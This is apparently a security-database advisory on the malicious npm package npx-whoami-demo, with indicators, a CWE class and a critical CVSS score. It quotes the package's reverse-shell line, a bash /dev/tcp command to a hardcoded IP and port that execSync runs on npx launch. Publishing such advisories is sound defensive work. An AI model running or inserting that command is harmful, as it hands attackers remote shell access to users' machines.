VDB
GCVE-110-OSM-2026-5938
GCVE-110-OSM-2026-5938
Advisory PublishedCVSS 9.6/10
This package contains a classic reverse shell payload in index.js: `bash -i >& /dev/tcp/101.43.232.7/7777 0>&1`, executed synchronously via `child_process.execSync` when the package is run via npx. The attacker model is straightforward — a victim running `npx npx-whoami-demo` gets a reverse shell connecting to the hardcoded attacker-controlled IP 101.43.232.7 on port 7777. The package description ('runs whoami') is a social engineering lure to encourage execution. Published by a brand-new account (ayoung2992 with qq.com email, one package, no history), consistent with a throwaway attacker account.
ENTRY
index.js (bin: ./index.js)
ADDITIONAL FINDINGS
- Shell Command Execution in index.js: "child_process").exec"
- Brand New Package
PAYLOAD FILES
index.js
INDICATORS (IOCs)
- ipv4: 101.43.232.7
- payloadFileHash: e086d4eb615db23b2fc9dc9a01b6814bbd54c07e0e4e65b2cf8a9440adab5d3c
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | npx-whoami-demo | all (affected) | — |
Aliases
Browse GCVE Records
73,280 records in the GCVE database · Updated July 17, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.